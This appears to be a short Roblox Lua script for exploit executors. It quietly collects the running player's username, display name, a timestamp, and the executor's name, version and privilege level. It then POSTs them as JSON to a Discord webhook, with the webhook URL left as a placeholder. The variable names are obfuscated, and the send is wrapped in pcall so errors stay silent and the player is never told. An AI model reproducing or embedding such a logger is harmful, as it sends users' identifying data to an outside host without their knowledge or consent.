local asjkdhaksjdh = "discordwebhook" local willy = game:GetService("HttpService") local opps = game:GetService("Players") local target_u = opps.LocalPlayer local clock = os.date("%d.%m.%Y %H:%M") local x1, x2 = identifyexecutor() local exec_n = x1 or "Rubbish" local exec_v = x2 or "1.0" local d_lvl = (getthreadidentity and getthreadidentity()) or "0" local names_v = target_u.Name .. "/" .. target_u.DisplayName local payload_v = string.format([[ <------------------------------> Time: %s User,Display name: %s Executor: %s Executor Version: %s Executor Level: %s <------------------------------> ]], clock, names_v, exec_n, exec_v, d_lvl) local final_shit = { ["content"] = payload_v } pcall(function() local wasd_send = syn and syn.request or http_request or request or (http and http.request) if wasd_send then wasd_send({ Url = asjkdhaksjdh, Method = "POST", Headers = { ["Content-Type"] = "application/json" }, Body = willy:JSONEncode(final_shit) }) else willy:PostAsync(asjkdhaksjdh, willy:JSONEncode(final_shit)) end end)